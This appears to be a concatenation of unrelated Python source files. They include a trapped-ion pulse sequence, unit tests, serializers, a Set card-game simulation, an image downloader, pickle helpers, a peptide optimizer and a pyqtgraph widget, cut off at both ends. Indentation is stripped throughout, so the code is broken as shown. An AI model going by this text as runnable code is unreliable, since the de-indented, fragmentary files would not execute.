amplitude_729="OpticalPumpingAux.amp_729"
att_729="OpticalPumpingAux.att_729"
sp_amp_729="Excitation_729.single_pass_amplitude"
sp_att_729="Excitation_729.single_pass_att"
def subsequence(self):
o = AuxOpticalPumping
self.get_729_dds(o.channel_729)
self.dds_866.set(o.frequency_866,
amplitude=o.amplitude_866)
self.dds_866.set_att(o.att_866)
self.dds_854.set(o.frequency_854,
amplitude=o.amplitude_854)
self.dds_854.set_att(o.att_854)
freq_729 = self.calc_frequency(
o.line_selection,
dds=o.channel_729
)
self.dds_729.set(freq_729,
amplitude=o.amplitude_729)
self.dds_729.set_att(o.att_729)
sp_freq_729 = 80*MHz + self.get_offset_frequency(o.channel_729)
self.dds_729_SP.set(sp_freq_729, amplitude=o.sp_amp_729)
self.dds_729_SP.set_att(o.sp_att_729)
with parallel:
self.dds_866.sw.on()
self.dds_854.sw.on()
self.dds_729.sw.on()
self.dds_729_SP.sw.on()
delay(o.duration)
with parallel:
self.dds_729.sw.off()
self.dds_729_SP.sw.off()
delay(2 * o.rempump_duration)
with parallel:
self.dds_854.sw.off()
self.dds_866.sw.off()
|
import csv
# ------- Authenticator
data = [] # Placeholder for current hex codes
entry = False # Main operation for entry
user_input = []
user_input.append(input("Code: "))
print("")
# --- Dataset Pull
with open('hex.csv','r') as codefile:
reader = csv.reader(codefile, delimiter=',')
for i in reader:
if i != []:
data.append(i[1])
# --- Comparing
for n in data:
if n == user_input[0]:
print("{} {}".format(n,"Approved"))
entry = True
else:
print(n)
print("\nEntry:",entry)
|
import FWCore.ParameterSet.Config as cms
pfClustersFromL1EGClusters = cms.EDProducer("PFClusterProducerFromL1EGClusters",
corrector = cms.string(''),
etMin = cms.double(0.5),
resol = cms.PSet(
etaBins = cms.vdouble(0.7, 1.2, 1.6),
kind = cms.string('calo'),
offset = cms.vdouble(0.838, 0.924, 1.101),
scale = cms.vdouble(0.012, 0.017, 0.018)
),
src = cms.InputTag("L1EGammaClusterEmuProducer")
)
|
from unittest import TestCase
from seqs.Permutations import PlainChanges, SteinhausJohnsonTrotter, Involutions
class PermutationTest(TestCase):
def test_Changes(self):
"""Do we get the expected sequence of changes for n=3?"""
self.assertEqual(list(PlainChanges(3)), [1, 0, 1, 0, 1])
def test_Lengths(self):
"""Are the lengths of the generated sequences factorial?"""
f = 1
for i in range(2, 7):
f *= i
self.assertEqual(f, len(list(SteinhausJohnsonTrotter(i))))
def test_Distinct(self):
"""Are all permutations in the sequence different from each other?"""
for i in range(2, 7):
s = set()
n = 0
for x in SteinhausJohnsonTrotter(i):
s.add(tuple(x))
n += 1
self.assertEqual(len(s), n)
def test_Adjacent(self):
"""Do consecutive permutations in the sequence differ by a swap?"""
for i in range(2, 7):
last = None
for p in SteinhausJohnsonTrotter(i):
if last:
diffs = [j for j in range(i) if p[j] != last[j]]
self.assertEqual(len(diffs), 2)
self.assertEqual(p[diffs[0]], last[diffs[1]])
self.assertEqual(p[diffs[1]], last[diffs[0]])
last = list(p)
def test_ListInput(self):
"""If given a list as input, is it the first output?"""
for L in ([1, 3, 5, 7], list("zyx"), [], [[]], list(range(20))):
self.assertEqual(L, next(SteinhausJohnsonTrotter(L)))
def test_Involutions(self):
"""Are these involutions and do we have the right number of them?"""
telephone = [1, 1, 2, 4, 10, 26, 76, 232, 764]
for n in range(len(telephone)):
count = 0
sorted = list(range(n))
invs = set()
for p in Involutions(n):
self.assertEqual([p[i] for i in p], sorted)
invs.add(tuple(p))
count += 1
self.assertEqual(len(invs), count)
self.assertEqual(len(invs), telephone[n])
|
from pyaedt.application.Analysis import Analysis
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modeler.Model2D import ModelerRMxprt
from pyaedt.modules.PostProcessor import CircuitPostProcessor
class FieldAnalysisRMxprt(Analysis):
"""Manages RMXprt field analysis setup. (To be implemented.)
This class is automatically initialized by an application call (like HFSS,
Q3D...). Refer to the application function for inputs definition.
Parameters
----------
Returns
-------
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
):
Analysis.__init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self._modeler = ModelerRMxprt(self)
self._post = CircuitPostProcessor(self)
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modules.Modeler`
"""
return self._modeler
@pyaedt_function_handler()
def disable_modelcreation(self, solution_type=None):
"""Enable the RMxprt solution.
Parameters
----------
solution_type :
Type of the solution. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self._design_type = "RMxprtSolution"
self.solution_type = solution_type
return True
@pyaedt_function_handler()
def enable_modelcreation(self, solution_type=None):
"""Enable model creation for the Maxwell model wizard.
Parameters
----------
solution_type : str
Type of the solution. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self._design_type = "ModelCreation"
self.solution_type = solution_type
return True
@pyaedt_function_handler()
def _check_solution_consistency(self):
"""Check solution consistency."""
if self.design_solutions:
return self._odesign.GetSolutionType() == self.design_solutions._solution_type
else:
return True
@pyaedt_function_handler()
def _check_design_consistency(self):
"""Check design consistency."""
consistent = False
destype = self._odesign.GetDesignType()
if destype == "RMxprt":
consistent = self._check_solution_consistency()
return consistent
|
import struct
from enum import Enum
from io import BufferedIOBase
from typing import Any, Optional, Union
from binary.serializers import BaseSerializer
from binary.struct_consts import (
ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG, ENDIAN_NETWORK, INT8_SIGNED,
INT8_UNSIGNED, INT16_SIGNED, INT16_UNSIGNED, INT32_SIGNED, INT32_UNSIGNED,
INT64_SIGNED, INT64_UNSIGNED, FLOAT, DOUBLE
)
__all__ = ['Endian', 'Int8', 'UInt8', 'Int16', 'UInt16', 'Int32', 'UInt32',
'Int64', 'UInt64', 'Float', 'Double', 'Byte', 'UByte', 'Short',
'UShort', 'Int', 'UInt', 'Long', 'ULong']
class Endian(Enum):
Native = ENDIAN_NATIVE
Little = ENDIAN_LITTLE
Big = ENDIAN_BIG
Network = ENDIAN_NETWORK
class _StructSerializer(BaseSerializer):
__struct_format__ = NotImplemented # type: Union[str, NotImplemented]
def __init__(self):
# type: () -> None
if self.__struct_format__ is NotImplemented:
raise NotImplementedError('Serializer has no __struct_format__ set.')
self.compiled_struct = struct.Struct(ENDIAN_LITTLE + self.__struct_format__)
def to_bytes(self, obj):
# type: (Any) -> bytes
return self.compiled_struct.pack(obj)
def from_bytes(self, bytes_stream):
# type: (BufferedIOBase) -> Any
size = self.compiled_struct.size
return self.compiled_struct.unpack_from(bytes_stream.read(size))
def try_get_size(self, obj=None):
# type: (Any) -> Optional[int]
return self.compiled_struct.size
class Int8(_StructSerializer):
__struct_format__ = INT8_SIGNED
class UInt8(_StructSerializer):
__struct_format__ = INT8_UNSIGNED
class Int16(_StructSerializer):
__struct_format__ = INT16_SIGNED
class UInt16(_StructSerializer):
__struct_format__ = INT16_UNSIGNED
class Int32(_StructSerializer):
__struct_format__ = INT32_SIGNED
class UInt32(_StructSerializer):
__struct_format__ = INT32_UNSIGNED
class Int64(_StructSerializer):
__struct_format__ = INT64_SIGNED
class UInt64(_StructSerializer):
__struct_format__ = INT64_UNSIGNED
class Float(_StructSerializer):
__struct_format__ = FLOAT
class Double(_StructSerializer):
__struct_format__ = DOUBLE
Byte = Int8
UByte = UInt8
Short = Int16
UShort = UInt16
Int = Int32
UInt = UInt32
Long = Int64
ULong = UInt64
|
from dbus_next.aio import MessageBus
from dbus_next import BusType
import asyncio
loop = asyncio.get_event_loop()
async def main():
# The typical path of systemd service on system DBUS
DBUS_SERVICE_SYSTEMD = 'org.freedesktop.systemd1'
# Path of kodi unit within systemd DBUS service
DBUS_OBJECT_UNIT_KODI = '/org/freedesktop/systemd1/unit/kodi_2eservice'
# Properties interface of DBUS (avaiable for all objects)
DBUS_INTERFACE_UNIT = 'org.freedesktop.systemd1.Unit'
# systemd.unit interface of DBUS systemd.unit objects
DBUS_INTERFACE_PROPERTIES = 'org.freedesktop.DBus.Properties'
bus = await MessageBus(bus_type=BusType.SYSTEM).connect()
# the introspection xml would normally be included in your project, but
# this is convenient for development
introspection = await bus.introspect(DBUS_SERVICE_SYSTEMD, DBUS_OBJECT_UNIT_KODI)
obj = bus.get_proxy_object(DBUS_SERVICE_SYSTEMD, DBUS_OBJECT_UNIT_KODI, introspection)
kodi = obj.get_interface(DBUS_INTERFACE_UNIT)
properties = obj.get_interface(DBUS_INTERFACE_PROPERTIES)
# Get current unit state
current_state = await properties.call_get(DBUS_INTERFACE_UNIT, 'ActiveState')
print(current_state.value)
#breakpoint()
# listen to properties changed signal.
# Of major interest is the property 'ActiveState'
def on_properties_changed(interface_name, changed_properties, invalidated_properties):
try:
print(changed_properties['ActiveState'].value)
except KeyError:
pass
properties.on_properties_changed(on_properties_changed)
# call methods on the interface (this causes kodi to stop)
await kodi.call_stop('fail')
# Wait for a never completing future - forever
await asyncio.get_running_loop().create_future()
loop.run_until_complete(main())
|
from django.forms import CheckboxInput, Textarea
class Toggle(CheckboxInput):
template_name = 'django_modals/widgets/toggle.html'
crispy_kwargs = {'template': 'django_modals/fields/label_checkbox.html', 'field_class': 'col-6 input-group-sm'}
class TinyMCE(Textarea):
template_name = 'django_modals/widgets/tinymce.html'
crispy_kwargs = {'label_class': 'col-3 col-form-label-sm', 'field_class': 'col-12 input-group-sm'}
|
import random
import collections
import itertools
"""
Game of Set (Peter Norvig 2010-2015)
How often do sets appear when we deal an array of cards?
How often in the course of playing out the game?
Here are the data types we will use:
card: A string, such as '3R=0', meaning "three red striped ovals".
deck: A list of cards, initially of length 81.
layout: A list of cards, initially of length 12.
set: A tuple of 3 cards.
Tallies: A dict: {12: {True: 33, False: 1}}} means a layout of size 12
tallied 33 sets and 1 non-set.
"""
#### Cards, dealing cards, and defining the notion of sets.
CARDS = [number + color + shade + symbol
for number in '123'
for color in 'RGP'
for shade in '@O='
for symbol in '0SD']
def deal(n, deck):
"Deal n cards from the deck."
return [deck.pop() for _ in range(n)]
def is_set(cards):
"Are these 3 cards a set? No if any feature has 2 values."
for f in range(4):
values = {card[f] for card in cards}
if len(values) == 2:
return False
return True
def find_set(layout):
"Return a set found from this layout, if there is one."
for cards in itertools.combinations(layout, 3):
if is_set(cards):
return cards
return ()
#### Tallying set:no-set ratio
def Tallies():
"A data structure to keep track, for each size, the number of sets and no-sets."
return collections.defaultdict(lambda: {True: 0, False: 0})
def tally(tallies, layout):
"Record that a set was found or not found in a layout of given size; return the set."
s = find_set(layout)
tallies[len(layout)][bool(s)] += 1
return s
#### Three experiments
def tally_initial_layout(N, sizes=(12, 15)):
"Record tallies for N initial deals."
tallies = Tallies()
deck = list(CARDS)
for deal in range(N):
random.shuffle(deck)
for size in sizes:
tally(tallies, deck[:size])
return tallies
def tally_initial_layout_no_prior_sets(N, sizes=(12, 15)):
"""Simulate N initial deals for each size, keeping tallies for Sets and NoSets,
but only when there was no set with 3 fewer cards."""
tallies = Tallies()
deck = list(CARDS)
for deal in range(N):
random.shuffle(deck)
for size in sizes:
if not find_set(deck[:size-3]):
tally(tallies, deck[:size])
return tallies
def tally_game_play(N):
"Record tallies for the play of N complete games."
tallies = Tallies()
for game in range(N):
deck = list(CARDS)
random.shuffle(deck)
layout = deal(12, deck)
while deck:
s = tally(tallies, layout)
# Pick up the cards in the set, if any
for card in s: layout.remove(card)
# Deal new cards
if len(layout) < 12 or not s:
layout += deal(3, deck)
return tallies
def experiments(N):
show({12: [1, 33], 15: [1, 2500]},
'the instruction booklet')
show(tally_initial_layout(N),
'initial layout')
show(tally_game_play(N // 25),
'game play')
show(tally_initial_layout_no_prior_sets(N),
'initial layout, but no sets before dealing last 3 cards')
def show(tallies, label):
"Print out the counts."
print()
print('Size | Sets | NoSets | Set:NoSet ratio for', label)
print('-----+--------+--------+----------------')
for size in sorted(tallies):
y, n = tallies[size][True], tallies[size][False]
ratio = ('inft' if n==0 else int(round(float(y)/n)))
print('{:4d} |{:7,d} |{:7,d} | {:4}:1'
.format(size, y, n, ratio))
def test():
assert len(CARDS) == 81 == len(set(CARDS))
assert is_set(('3R=O', '2R=S', '1R=D'))
assert not is_set(('3R=0', '2R=S', '1R@D'))
assert find_set(['1PO0', '2G=D', '3R=0', '2R=S', '1R=D']) == ('3R=0', '2R=S', '1R=D')
assert not find_set(['1PO0', '2G=D', '3R=0', '2R=S', '1R@D'])
photo = '2P=0 3P=D 2R=0 3GO0 2POD 3R@D 2RO0 2ROS 1P@S 2P@0 3ROS 2GOD 2P@D 1GOD 3GOS'.split()
assert not find_set(photo)
assert set(itertools.combinations([1, 2, 3, 4], 3)) == {(1, 2, 3), (1, 2, 4), (1, 3, 4), (2, 3, 4)}
print('All tests pass.')
test()
experiments(100000)
|
import math
def soma_distancias(lista_das_coordenadas, referencia):
soma = 0
for i in range(0,len(lista_das_coordenadas)):
distancia = math.sqrt( ((referencia[0] - lista_das_coordenadas[i][0]) ** 2) + ((referencia[1] - lista_das_coordenadas[i][1]) ** 2) + ((referencia[2] - lista_das_coordenadas[i][2]) ** 2))
soma += distancia
return round(soma, 2)
def deslocamento(lista_das_coordenadas, qtd_ciclos, diferencial_deslocamento, referencia_convertida):
lista_coordenadas_depois_dos_deslocamentos = []
soma_distancias_deslocadas = 0
vetor_soma_distancias_deslocadas = []
for i in range(1, qtd_ciclos+1):
coordenadas_pos_deslocamento=[]
for j in range(0, len(lista_das_coordenadas)):
novo_ponto=[]
for k in range(0, 3):
if k == 2:
novo_ponto.append(round(lista_das_coordenadas[j][k] + (diferencial_deslocamento*i),2))
else:
novo_ponto.append(round(lista_das_coordenadas[j][k] - (diferencial_deslocamento*i),2))
coordenadas_pos_deslocamento.append(novo_ponto)
lista_coordenadas_depois_dos_deslocamentos.append(coordenadas_pos_deslocamento)
soma_distancias_deslocadas = soma_distancias(coordenadas_pos_deslocamento,referencia_convertida)
vetor_soma_distancias_deslocadas.append(round(soma_distancias_deslocadas, 2))
return vetor_soma_distancias_deslocadas,lista_coordenadas_depois_dos_deslocamentos
def imprimir_coordenadas_iniciais(lista_coordenadas):
print("Pontos Originais: ")
for i in range(0, len(lista_coordenadas)):
print(" " + "(" + str(lista_coordenadas[i][0]) + "," + str(lista_coordenadas[i][1]) + "," + str(lista_coordenadas[i][2]) + ")")
def imprimir_coordenadas_deslocadas(lista_coordenadas, lista_coordenadas_deslocadas, qtd_ciclos, diferencial_deslocamento, referencia, vetor_soma_distancias_deslocadas):
for i in range(1, qtd_ciclos + 1):
print("Listagem de Pontos no Ciclo " + str(i) + ", Delta de deslocamento " + str(diferencial_deslocamento) + ": ")
for j in range(0, len(lista_coordenadas)):
print(" " + "(" + str(lista_coordenadas_deslocadas[i-1][j][0]) + "," + str(lista_coordenadas_deslocadas[i-1][j][1]) + "," + str(lista_coordenadas_deslocadas[i-1][j][2]) + ")")
print("Soma das distâncias para o ponto "+ str(referencia_convertida) + ": ", str(vetor_soma_distancias_deslocadas[i-1]))
print()
#-----------------------------------CORPO DO PROGRAMA------------------------------------------------------------
i=1
vetor_coordenada=[]
lista_das_coordenadas = []
referencia_aux = []
referencia_convertida=[]
vetor_distancias_deslocadas = []
lista_coordenadas_depois_dos_deslocamentos = []
while i >= 1:
coordenada = input("Digite a coordenada: ")
if coordenada == "":
ponto_de_referencia = input("Digite o ponto de referencia: ")
referencia_aux = ponto_de_referencia.split()
for i in range(0, 3):
referencia_aux[i] = float(referencia_aux[i])
referencia_convertida = referencia_aux
break
else:
vetor_coordenada = coordenada.split()
for i in range(0, 3):
vetor_coordenada[i] = float(vetor_coordenada[i])
lista_das_coordenadas.append(vetor_coordenada)
imprimir_coordenadas_iniciais(lista_das_coordenadas)
print("Soma das distâncias para o ponto "+ str(referencia_convertida) + ": ", soma_distancias(lista_das_coordenadas,referencia_convertida))
qtd_ciclos = int(input("Digite o número de ciclos: "))
diferencial_deslocamento = float(input("Digite o difirencial de deslocamento: "))
vetor_soma_distancias_deslocadas, lista_coordenadas_depois_dos_deslocamentos = deslocamento(lista_das_coordenadas, qtd_ciclos, diferencial_deslocamento, referencia_convertida)
imprimir_coordenadas_deslocadas(lista_das_coordenadas, lista_coordenadas_depois_dos_deslocamentos, qtd_ciclos, diferencial_deslocamento, referencia_convertida, vetor_soma_distancias_deslocadas)
|
'''
Function:
图片下载器
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import sys
import time
import click
if __name__ == '__main__':
from modules import *
from __init__ import __version__
else:
from .modules import *
from .__init__ import __version__
'''basic info'''
BASICINFO = '''************************************************************
Function: 图片下载器 V%s
Author: Charles
微信公众号: Charles的皮卡丘
操作帮助:
输入r: 重新初始化程序(即返回主菜单)
输入q: 退出程序
图片保存路径:
当前路径下的%s文件夹内
************************************************************'''
'''图片下载器'''
class imagedl():
def __init__(self, configpath=None, config=None, **kwargs):
assert configpath or config, 'configpath or config should be given'
self.config = loadconfig(configpath) if config is None else config
self.supported_sources = {
'bing': BingImageDownloader,
'baidu': BaiduImageDownloader,
'google': GoogleImageDownloader,
}
'''运行'''
def run(self, target_src=None):
while True:
print(BASICINFO % (__version__, self.config.get('savedir')))
# 输入关键字
user_input = self.dealInput('请输入图片搜索的关键词: ')
target_src = 'baidu' if target_src is None else target_src
# 初始化
selected_api = self.supported_sources[target_src](
auto_set_proxies=self.config.get('auto_set_proxies', True),
auto_set_headers=self.config.get('auto_set_headers', True),
)
# 开始下载
selected_api.download(
keyword=user_input,
search_limits=self.config.get('search_limits', 1000),
num_threadings=self.config.get('num_threadings', 5),
savedir=self.config.get('savedir'),
)
'''处理用户输入'''
def dealInput(self, tip=''):
user_input = input(tip)
if user_input.lower() == 'q':
self.logging('ByeBye')
sys.exit()
elif user_input.lower() == 'r':
self.run()
else:
return user_input
'''logging'''
def logging(self, msg, tip='INFO'):
print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
'''str'''
def __str__(self):
return 'Welcome to use imagedl!\nYou can visit https://github.com/CharlesPikachu/imagedl for more details.'
'''cmd直接运行'''
@click.command()
@click.version_option()
@click.option('-k', '--keyword', default=None, help='想要搜索下载的图片关键字, 若不指定, 则进入imagedl终端版')
@click.option('-s', '--savedir', default='images', help='下载的图片的保存路径')
@click.option('-t', '--target', default='baidu', help='指定图片搜索下载的平台, 例如"baidu"')
@click.option('-l', '--limits', default=1000, help='下载的图片数量')
@click.option('-n', '--nthreadings', default=5, help='使用的线程数量')
def imagedlcmd(keyword, savedir, target, limits, nthreadings):
config = {
'savedir': savedir,
'auto_set_proxies': True,
'auto_set_headers': True,
'search_limits': limits,
'num_threadings': nthreadings,
}
dl_client = imagedl(config=config)
if keyword is None:
dl_client.run(target_src=target)
else:
print(dl_client)
supported_sources = {
'bing': BingImageDownloader,
'baidu': BaiduImageDownloader,
'google': GoogleImageDownloader,
}
selected_api = supported_sources[target](
auto_set_proxies=config.get('auto_set_proxies', True),
auto_set_headers=config.get('auto_set_headers', True),
)
selected_api.download(
keyword=keyword,
search_limits=config.get('search_limits', 1000),
num_threadings=config.get('num_threadings', 5),
savedir=config.get('savedir'),
)
'''run'''
if __name__ == '__main__':
dl_client = imagedl('config.json')
dl_client.run() |
import pickle
#Finds the variable associated with a variable name
def get_obj(globals, locals, arg):
try:
try:
obj = locals[arg]
except:
obj = globals[arg]
return obj
except:
print('Invalid variable name entered:', arg)
raise ValueError
#Pickles objects
def save(globals, locals, filename, *args):
get = lambda arg: get_obj(globals, locals, arg)
objs = tuple(map(get, args))
objs_dict = dict(zip(args, objs))
file = open(filename, 'wb')
pickle.dump(objs_dict,file)
file.close()
#Loads objects from file and unpickles them
def _load(filename, *args):
file = open(filename, 'rb')
objs = pickle.load(file)
file.close()
get_obj = lambda arg: objs[arg]
objs_tuple = tuple(map(get_obj, args))
return objs_tuple
#Loads objects directly into locals
def implicit_load(locals, filename, *args):
objs_tuple = _load(filename, *args)
for i in range(len(args)):
locals[args[i]] = objs_tuple[i]
#Returns an object or tuple of unpickled object
def explicit_load(filename, *args):
objs_tuple = _load(filename, *args)
if len(objs_tuple) > 1:
return objs_tuple
else:
return objs_tuple[0]
|
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import savemat
import pickle
from modlamp.sequences import Random
from modlamp.descriptors import PeptideDescriptor, GlobalDescriptor
from modlamp.core import load_scale
from sklearn.preprocessing import StandardScaler
import physbo
import threading
import copy
class ParallelThread(threading.Thread):
def __init__(self, func, args, name=''):
threading.Thread.__init__(self)
self.name = name
self.func = func
self.args = args
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
class SelfLearningEPA():
def __init__(self, plen, num_particle, MC_step=1, numiter=20, seed=1):
self.am = ['A','C','D','E','F','G','H','I','K','L','M','N','P','Q','R','S','T','V','W','Y']
self.num_exp = 0
self.num_particle = num_particle
np.random.seed(seed)
self.plen = plen
self.numiter = numiter
self.betas = np.linspace(0,10,numiter)
self.num_discretize = 50
self.es = np.zeros(self.num_discretize)
self.scaler = StandardScaler()
# fake MC_step
self.MC_step = MC_step
# Initial state
self.lib = Random(num_particle,lenmin=plen,lenmax=plen)
self.lib.generate_sequences(proba='rand')
# Descriptor
self.tscale = load_scale('t_scale')[1]
self.X_train = []
self.X_train_scaled = []
self.t_train = []
self.allenergy = np.zeros([self.numiter, self.num_particle])
self.allseq = [['']*self.num_particle for i in range(self.numiter)]
self.E_max = 0
self.E_min = 0
def self_learning_population_annealing(self):
# initial random state
x_current = np.array(self.lib.sequences)
E_current = self.calculating_value(list(x_current))
allenergy_surr = np.zeros([self.numiter, self.num_particle])
for biter in range(self.numiter):
print("iteration =",biter)
print("mean value of E =",np.mean(E_current),"+/-",np.std(E_current))
print("number of training data =",len(self.t_train))
if biter != 0:
# resampling
x_current, E_current_surr = self.resampling(self.betas[biter], self.betas[biter-1], E_current_surr, E_current_surr_prev, x_current)
# MCMC
threads = []
for i in range(self.num_particle):
t = ParallelThread(self.MCMC, (x_current[i], E_current_surr[i], biter, gp), self.MCMC.__name__)
threads.append(t)
for i in range(self.num_particle):
threads[i].start()
for i in range(self.num_particle):
threads[i].join()
for i in range(self.num_particle):
x_current[i], E_current_surr[i] = threads[i].get_result()
E_current = self.calculating_value(list(x_current))
E_current_surr_prev = copy.deepcopy(E_current_surr)
# add training data
for i in range(len(x_current)):
x_desc = self.trans_descriptor(x_current[i])
self.X_train.append(x_desc)
self.t_train.append(E_current[i])
self.X_train_scaled = self.scaler.fit_transform(self.X_train)
# surrogate model
gp = self.train_model()
# surrogate E
X_test = []
for i in range(len(x_current)):
x_desc = self.trans_descriptor(x_current[i])
X_test.append(x_desc)
X_test_scaled = self.scaler.transform(X_test)
E_current_surr = gp.get_post_fmean(np.array(self.X_train_scaled), np.array(X_test_scaled))
if biter == 0: E_current_surr_prev = copy.deepcopy(E_current_surr)
self.allenergy[biter] = E_current
self.allseq[biter] = x_current
allenergy_surr[biter] = E_current_surr_prev
allseq_all = copy.deepcopy(self.allseq)
allenergy_all = copy.deepcopy(self.allenergy)
for biter in range(len(self.allenergy)):
self.allseq[biter], self.allenergy[biter] = self.resampling(self.betas[biter], self.betas[biter], self.allenergy[biter], allenergy_surr[biter], self.allseq[biter])
return allseq_all, allenergy_all
def collect_observable(self, thresarray, f, sequences, energy):
R = np.zeros([self.num_discretize,self.numiter])
for i in range(self.num_discretize):
for j in range(self.numiter):
R[i][j] = np.exp(-self.betas[j]*self.es[i] + f[j])
R[i] = R[i]/np.sum(R[i])
counter = np.zeros((len(thresarray), self.plen, len(self.am)))
for thresid in range(len(thresarray)):
thres = thresarray[thresid]
# observable
for biter in range(self.numiter):
matches= [self.allseq[biter][i] for i,x in enumerate(self.allenergy[biter]) if x <= thres]
matchenergy = [self.allenergy[biter][i] for i,x in enumerate(self.allenergy[biter]) if x <= thres]
for ip in range(self.plen):
for j in range(len(self.am)):
mm = [matchenergy[i] for i,x in enumerate(matches) if x[ip] == self.am[j]]
for k in mm:
ik = int((k-self.E_min)/(self.E_max-self.E_min)*self.num_discretize)
counter[thresid][ip][j] += R[ik][biter]*np.exp(self.betas[biter]*self.es[ik]-f[biter])
#counter[ip][j] += 1
edict = {}
for i in range(self.numiter):
for j in range(self.num_particle):
edict[sequences[i][j]] = energy[i][j]
c = 0
for i in edict:
if (edict[i] <= thres):
c +=1
print("********************")
print("thres =", thres)
print("number of experiments =", self.num_exp)
print("UNIQsample =", len(edict))
print("UNIQseq =",c)
print("MIN =",np.min(energy))
if (np.sum(counter[thresid]) > 0):
counter[thresid] /= np.sum(counter[thresid])
return counter
def resampling(self, beta_current, beta_prev, E_current, E_current_prev, seq_current):
prob = np.exp(-beta_current*E_current + beta_prev*E_current_prev)
prob = prob/np.sum(prob)
ids = np.random.choice(self.num_particle,self.num_particle, p=prob, replace=True)
seq_current = np.array(seq_current)[ids]
E_current = np.array(E_current)[ids]
return seq_current, E_current
def MCMC(self, x_curr, e_curr, biter, gp):
for _ in range(self.MC_step):
x_proposal = self.mutation(x_curr)
X_test_scaled = self.scaler.transform([self.trans_descriptor(x_proposal)])
E_proposal = gp.get_post_fmean(np.array(self.X_train_scaled), np.array(X_test_scaled))[0]
if np.exp(self.betas[biter]*(e_curr - E_proposal)) > np.random.rand():
x_curr = x_proposal
e_curr = E_proposal
return x_curr, e_curr
def mutation(self, x):
x = list(x)
select_dimension = np.random.randint(0, self.plen)
x[select_dimension] = np.random.choice(self.am)
return ''.join(x)
def make_histogram(self):
self.E_max = np.max(self.allenergy)+0.000001
self.E_min = np.min(self.allenergy)-0.000001
estdists = np.zeros([self.numiter,self.num_discretize])
for biter in range(self.numiter):
for e in self.allenergy[biter]:
index_current = int((e-self.E_min)/(self.E_max-self.E_min)*self.num_discretize)
estdists[biter][index_current] += 1
return estdists
def multi_histogram(self):
estdists = self.make_histogram()
estsum = np.sum(estdists,axis = 0)
width = self.E_max-self.E_min
for i in range(self.num_discretize):
low = self.E_min + i*width/self.num_discretize
high = self.E_min + (i+1)*width/self.num_discretize
self.es[i] = (high+low)/2
f = np.zeros(self.numiter)
for fiter in range(10):
estn = np.zeros(self.num_discretize)
for i in range(self.num_discretize):
res = 0
for j in range(self.numiter):
res = res + sum(estdists[j,:])*np.exp(-self.betas[j]*self.es[i]+f[j])
estn[i] = estsum[i]/res
for j in range(self.numiter):
f[j] = -np.log(np.dot(estn, np.exp(-self.betas[j]*self.es)))
estn = estn/np.sum(estn)
return estn, f
def trans_descriptor(self, x):
desc = []
for i in range(self.plen):
desc += self.tscale[x[i]]
return desc
def train_model(self):
cov = physbo.gp.cov.gauss(np.array(self.X_train_scaled).shape[1], ard = False)
mean = physbo.gp.mean.const()
lik = physbo.gp.lik.gauss()
gp = physbo.gp.model(lik=lik,mean=mean,cov=cov)
config = physbo.misc.set_config()
gp.fit(np.array(self.X_train_scaled), np.array(self.t_train), config)
gp.prepare(np.array(self.X_train_scaled), np.array(self.t_train))
return gp
def calculating_value(self, population, function='moment_tm'):
score = []
if not isinstance(population,list):
population = [population]
if function == 'moment_eisenberg':
desc = PeptideDescriptor(population,'eisenberg')
desc.calculate_moment()
score = desc.descriptor
elif function == 'moment_tm':
desc = PeptideDescriptor(population,'TM_tend')
desc.calculate_moment()
score = desc.descriptor
global num_exp
self.num_exp += len(population)
score = -score
return [*score.flat]
def hellinger(p,q):
return np.linalg.norm(np.sqrt(p)-np.sqrt(q))/np.sqrt(2)
|
# Licensed under the MIT License
# https://github.com/craigahobbs/unittest-parallel/blob/main/LICENSE
|
# Description: Print five rows of the Iobs for a specified Miller array.
# Source: NA
"""
list(Iobs[${1:100:105}])
"""
list(Iobs[100:105])
|
import numpy as np
from AnyQt.QtWidgets import QGraphicsLineItem
from AnyQt.QtCore import QRectF, QLineF
from AnyQt.QtGui import QTransform
import pyqtgraph as pg
class TextItem(pg.TextItem):
if not hasattr(pg.TextItem, "setAnchor"):
# Compatibility with pyqtgraph <= 0.9.10; in (as of yet unreleased)
# 0.9.11 the TextItem has a `setAnchor`, but not `updateText`
def setAnchor(self, anchor):
self.anchor = pg.Point(anchor)
self.updateText()
class AnchorItem(pg.GraphicsObject):
def __init__(self, parent=None, line=QLineF(), text="", **kwargs):
super().__init__(parent, **kwargs)
self._text = text
self.setFlag(pg.GraphicsObject.ItemHasNoContents)
self._spine = QGraphicsLineItem(line, self)
angle = line.angle()
self._arrow = pg.ArrowItem(parent=self, angle=0)
self._arrow.setPos(self._spine.line().p2())
self._arrow.setRotation(angle)
self._arrow.setStyle(headLen=10)
self._label = TextItem(text=text, color=(10, 10, 10))
self._label.setParentItem(self)
self._label.setPos(self._spine.line().p2())
if parent is not None:
self.setParentItem(parent)
def setText(self, text):
if text != self._text:
self._text = text
self._label.setText(text)
self._label.setVisible(bool(text))
def text(self):
return self._text
def setLine(self, *line):
line = QLineF(*line)
if line != self._spine.line():
self._spine.setLine(line)
self.__updateLayout()
def line(self):
return self._spine.line()
def setPen(self, pen):
self._spine.setPen(pen)
def setArrowVisible(self, visible):
self._arrow.setVisible(visible)
def paint(self, painter, option, widget):
pass
def boundingRect(self):
return QRectF()
def viewTransformChanged(self):
self.__updateLayout()
def __updateLayout(self):
T = self.sceneTransform()
if T is None:
T = QTransform()
# map the axis spine to scene coord. system.
viewbox_line = T.map(self._spine.line())
angle = viewbox_line.angle()
assert not np.isnan(angle)
# note in Qt the y axis is inverted (90 degree angle 'points' down)
left_quad = 270 < angle <= 360 or -0.0 <= angle < 90
# position the text label along the viewbox_line
label_pos = self._spine.line().pointAt(0.90)
if left_quad:
# Anchor the text under the axis spine
anchor = (0.5, -0.1)
else:
